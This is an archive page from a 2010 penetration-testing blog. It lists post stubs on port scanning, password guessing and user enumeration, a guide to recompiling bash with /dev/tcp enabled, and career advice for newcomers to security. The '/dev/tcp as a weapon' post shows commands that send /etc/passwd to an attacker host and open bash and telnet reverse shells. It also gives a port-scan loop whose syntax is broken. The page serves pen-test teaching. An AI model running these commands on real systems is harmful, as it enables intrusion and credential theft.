We Moved to SecureGossip!

Posted in Uncategorized on September 2, 2010 by Skyler

Security Reliks has become part of the SecureGossip initiative! We will no longer be double posting. However, I will post an RSS when we get that implemented.

All of our posts will now be made over there, as well as an archive of older posts!

We Moved Here!

 

Weaponizing cmd.exe – Port Scanning

Posted in Fu (a.k.a Tips) on August 30, 2010 by Skyler

I have posted a cmd.exe entry for how to conduct port scans via cmd.exe

read it here on the new blog!

Weaponizing cmd.exe – UN/PW Guessing

Posted in Fu (a.k.a Tips) on August 27, 2010 by Skyler

This is a fantastic way to automate a dictionary attack on windows net accounts. This is part of my salute to Pentesting Ninjitsu.

See the full version on the new blog!

Continue reading

Weaponizing cmd.exe – Enumerate users (inspite of RestrictAnonymous)

Posted in Fu (a.k.a Tips) on August 26, 2010 by Skyler

Okay. Continuing on with the series. Now that we have  mapped the network, we need to enumerate users on the active hosts. Often times you will be preforming a Penetration Test on a windows machine. In the event that the machine has RestrictAnonymous set, you may find it difficult to enumerate users using your null session. It is important to note that this does not make it impossible! tools like enum rely upon the null session enumeration option,  therefore RestrictAnonymous = 2 ruins the use of that tool (and others like it). I am going to show you a method to brute force usernames in a different manner. For this you will need two tools, sid2user, and user2sid. You can get them here.

Read the rest of the post on the new blog!

Continue reading

Weaponizing cmd.exe – DNS Reverse Lookup

Posted in Fu (a.k.a Tips) on August 25, 2010 by Skyler

Here is a nice way to perform a reverse lookup of all the hosts on your network. It uses the nslookup <ip> command to do it.

Find the entire post on the new blog site!

Continue reading

Weaponizing cmd.exe – Ping Sweep

Posted in Fu (a.k.a Tips) on August 24, 2010 by Skyler
This is part of my tribute to PenTesting Ninjitsu. Here is a nice quick way to perform a ping sweep from the windows command line.
See the official post on the new blog!
Continue reading

We have moved to SecureGossip!!!

Posted in News on August 23, 2010 by Skyler

Security Reliks has become part of the SecureGossip initiative!

All of our posts will now be made over there, as well as an archive of older posts!

We Moved Here!

Enabling /dev/tcp on Backtrack 4r1(Ubuntu)

Posted in Fu (a.k.a Tips) on August 23, 2010 by Skyler

After my post on weaponizing /dev/tcp, I had some kickback  from people trying to test it out. Users on a Debian based system will have issues since bash is not compiled with /dev/tcp enabled. All it requires is a quick recompiling of the shell, and a few changes after that:

Step 1: Download the latest BASH source

use a browser to get it here.

or

cd /tmp
sudo wget ftp.gnu.org/gnu/bash/bash-4.1.tar.gz

NOTE: Backtrack uses an older version of bash. I am not sure if they do this for any specific reason. I compiled 4.1 and havn’t had any issues. Let me know if you know otherwise

Step 2: Extract the source code

tar zxvf bash-4.1.tar.gz
cd bash-4.1

Step 3: Configure and install

sudo su
./configure --enable-net-redirections
make && make install

Step 4: Replace old version of bash with the new version

mv /bin/bash /bin/bash-OLD
ln -s /usr/local/bin/bash /bin/bash

Step 5: Test!

check to see if your new installation works. Close your current terminal, and reopn it. Then issue the following command and check the results:

reliks@bt:/tmp$ bash --version
GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)
..... reliks@bt:/tmp$ /bin/bash --version GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)
The versions returned should be that of which you just installed. They should also match.

You can now test to see if your access to /dev/tcp works:

cat < /dev/tcp/time.nist.gov/13

There you go! You should get back the time according to NIST.

Let me know if you have any issues! thanks!

/dev/tcp as a weapon

Posted in Fu (a.k.a Tips) on August 20, 2010 by Skyler

Here is some Fu to improve your game when pen testing *nix.

Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:

  1. Scope prevents you from uploading any files onto the machine
  2. A Firewall/AV prevents using something like netcat.

what do you do? Use /dev/tcp

What is /dev/tcp?

this is a system file that allows you to interact directly with the tcp protocol.

Fu

In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:

$ nc -l -p <port>

Transfer file:

This is pretty straight forward, just like you would image:

cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>

Back on your listener console, you would then see the contents of /etc/passwd displayed. You would then easily pipe that into a file for parsing or future reference.

Port Scanner

This piece or art comes from Pen Testing Ninjitsu. To create a port scanner using built in bash commands, this is what you are looking to do:

$port = 1; while [$port -lt 1024];do echo > /dev/tcp/<TARG_IP>/$port;
 [$? == 0] && echo $port "is open" >> /tmp/ports.txt; port = 'expr 
$port + 1'; done;

Let me break this down for you:

  • Create a variable called port, and set its value equal to 1
port = 1;
  • Create a loop that continues to run as long as the variable ‘port’ is less than 1024
while [$port -lt 1024];
  • For each iteration, send some packets to the target IP address, with the port number equal to the current value of  our ‘port’ variable
do echo > /dev/tcp/<TARG_IP>/$port;
  • Check to see what the bash error value is as a result of that echo into /dev/tcp. Check to see if it is equal to zero, or in other words, check to see if there were no errors
[$? == 0]
  • If it IS equal to zero, or in other words, there were no errors, append a string into /tmp/ports.txt stating that the last scanned port is open
&& echo $port "is open" >> /tmp/ports.txt;
  • Now increment the value of ‘port’ by 1, and finish this iteration of the loop.
port = 'expr $port + 1'; done;

Pretty messy, but also fairly straight forward. You could then just read

Backdoor/Reverse Shell

This is pretty slick in my opinion. Replicates netcat almost exactly. Not as pretty as some things, but still nice:

/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1

This is also straight forward:

  • Invoke an interactive bash shell
/bin/bash -i
  • Pipe that shell to the attacker (who has a netcat listener running)
> /dev/tcp/<Attacker_IP>/<port>
  • Take standard input, and connect it to standard output. Do the same with standard error (2>)
0<&1 2>&1

This can also be similarly done using telnet by doing the following (although you need two listeners):

telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>

Pretty elite. hope it helps!

Security 101: bitter sweet beginnings

Posted in Fu (a.k.a Tips) on August 19, 2010 by Skyler

I am creating this entry for my friend Sean. He was curious as to how to get into the security field. So here goes:

Why getting started is difficult

There are a few reasons getting into the security field is difficult. I have narrowed it down into a couple of reasons:

  1. The knowledge base grows faster than you can learn – What I mean by this is that new things are being developed/discovered ever few minutes. I remember getting started in security, I would spend time learning something out of a book, or off of a webpage, just to find out that it was now old news. I would try fervently to climb the ladder, starting at the basics working my way up. However, after trying desperately to climb as fast as I could I began to notice that the ladder was growing taller faster than I could climb! This can be disheartening.
  2. the width is just as big as the depth – There are so many different aspects of security! Testing, Incident Handling, Infrastructure, Management, etc, etc. They all seem to be quite similar, but also quite different in the kinds of skill sets they require! I remember feeling like the deeper I tried to delve into one area, the more complex and slower the learning became; Therefore the more I was falling behind in the other areas! This was very frustrating.
  3. the starting line is quite vague – The first article I was told to read was Aleph One’s Smashing the Stack For Fun and Profit. Because I was 15 years old with little lower-level language experience. O was completely overwhelmed. I would run into phrases and words I didnt understand. I would search to learn about those things. In the course of getting definitions of those terms, I found myself encountering more nonsensical data! Therefore my search began digging deeper and deeper, eventually becoming a hole that never led back to my starting point. This was overwhelming.

Disheartening, Frustrating, and Overwhelming…

So you see, getting started in the security field is difficult. I am sure many people have different experiences. I suppose getting started through formal education, or work experience helps.  I pretty much had nothing except the web, IRC, and some less-novice hacker than I who I could throw questions at. It was a miracle I didn’t just give up on it. I am going to share with you some tips/mindsets I developed from my experience, as well as some resources and wisdom I can share looking back on the situation.

(A  quick word from the Mentor)

In order to succeed, you just need to commit yourself. If you are committed, you are going to do amazing! Seriously, Security is quite technical, but amazingly simplistic. To explain what I mean, let me share with you a quote from the Hacker’s Manifesto (i know, i know, just bare with me):

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up. Not because it doesn’t like me…
Or feels threatened by me…
Or thinks I’m a smart ass…

I like this quote because it takes the magic out of computers. It reminds me that a computer simply has a set of rules, and that understanding those rules enables you to manipulate the system. Therefore, when learning security, remember that you are really just learning rules. Don’t get caught up in the proscribed methods, but recognize why those methods produce the results they do. If you do this, you will find yourself asking the RIGHT questions, and finding the BEST answers. This is KEY.

…But

Now that we have that out of the way, I am going to address the three issues I listed above:

  1. Knowledge base – This is simple. Don’t become disheartened. Just learn to plug yourself in. In the military, when doing combat maneuvers, you always provide security. Security elements will protect the primary element from becoming overran by any unexpected enemy reinforcements. Do this in your learning. Plug in to sources of the newest developments in the security field. This will ensure that you are learning the new stuff while you are catching up on the fundamentals. I recommend a few sources for this:
    • Mailing Lists: These are a great resource. Most security lists are very well moderated, and very active. I recommend most of the SecurityFocus lists, the Metasploit list , and maybe a few others. That should be enough for now.
    • Blogs: Blogs are a great resource. Some are better than others, but they are a great place to start. Check out my favorite security links located on the right panel of my blog. Some of my favorites are Darknet, and Mubix’s blog.
    • Podcasts: I Love my podcasts! I am always looking out for new ones! I strongly recommend PaulDotCom and SecurityNow. In addition you might like Hak5, and some others. I also recommend the SANS Internet Storm Center casts to be caught up to date on the latest and greatest security vulnerabilities.
    • News: These are critical. In my opinion the best site overall for security is Packetstorm. They offer learning texts, tool archives, and the latest news. I also watch the SANS ISC journals, and the SANS reading room.
    • Twitter – The security industry is extremely active on twitter. You should plug yourself in to them to get started. I think all but 2 of the people I follow on twitter are security based. Go ahead and use that as a good place to start.
  2. Width vs Depth: When it really comes down to it, you will just need to find one (or two) areas you really enjoy. When I say “Enjoy”, i mean it. You may want to end up doing management, but to start out I would find what appeals to you the most. This will guarantee that you keep interested, and will feel accomplished as you learn things! One thing I quickly learned was the amount of spillover that occurs at the deepest parts of each security emphasis. Truly, infrastructure will eventually lead to testing/auditing,  as well as incident handling, and so on. Like I said, find something you like, build a good basis, and then don’t be afraid to dive deep into what you enjoy. You will eventually find that you learn about all aspects of security, and wont mind the areas you lack in. The Security community is such a shared pool of knowledge, that learning from each other is half the fun. On that note, here are some tips to assist with this process:
    • Find your emphasis: Ask people on the mailing lists, search through forums, look for job descriptions. What I did was figure out what I thought was cool (breaking stuff), figure out what it was called (“hacking”), and then research what professional positions existed (Penetration Testing).
    • Find a mentor: Its all about who you know. Find someone who can help you answer your questions. They dont need to know everything, they just need to help point you in the right direction. My first mentors were a group of guys in an IRC channel. freenode has a ton of free channels. I would recommend checking out the above podcasts and looking into their IRC channels for people to help.
    • Hands-On as soon as possible – Get your hands-on right away. Download BackTrack to get your hands on a lot of new tools, and start learning linux. Don’t worry about knowing ALL of it; just learn what you need, and as further needs arise figure out how to do it. A great resource to figure out how to do things is SecurityTube. This site will give you tutorials and presentations on almost anything you need to know, from programming to hacking, etc. There are also a lot of great resources for practicing security related activities. Some of these are:
    • Certifications – I have found certifications to be great learning opportunities, not to mention how they increase your professional marketability. There are so many certs out there, that you can find one for whatever you are interested in. For those looking to do government/military work, I would look at the DoD 8570 to see what certs would give you the most flexibility for jobs. Here are some that I suggest:
      • Security+ – Overall great certification. If you want a good place to start for just overall security knowledge, this is the one you want.
      • eCPPT – I havn’t done this course, but I have heard nothing but great reviews. It includes the courseware for life, making it an excellent resource after you get the certification.
      • CEH – This is a great starter for those interested in penetration testing, or incident handling. I would strongly recommend this.
      • CCNA – If you are going to be doing more infrastructure, you may want to look into Cisco stuff. I put the CCNA because its considered the entry level Cisco cert. You eventually might want the CCNA-Security and some of the other certs that qualify you for firewalls and ids configuration.
      • CHFI – This is a good Incident Handler certification. Pretty cheap. I think you have to take the CEH before you can take this one.
  3. Starting Line: There is none. Thats okay. You need to learn to revel in the successes! Become a sponge and just absorb everything. When you read something you don’t understand, dont fret. Just remember it, let it serve as a placeholder, and learn about it when you can. Dont let this be overwhelming! Let it be FUN! Find opportunities to teach others and you will figure out more than you would have initially. There are a few things I would recommend you learn that will answer a large amount of your potential questions:
    • TCP/IP – Learn about TCP/IP packets, layers, and basic communications. Understand these and you will do well. I would take the time to read the RFCs for these specific protocols.
    • Basic Programming – Being able to read through code logic. not necessarily know how to program.
    • Linux/Windows commands – knowing your way around the command line of both these systems will help greatly.

Hopefully this has been a good start to helping those get involved. Feel free to ask any questions.

Enjoy!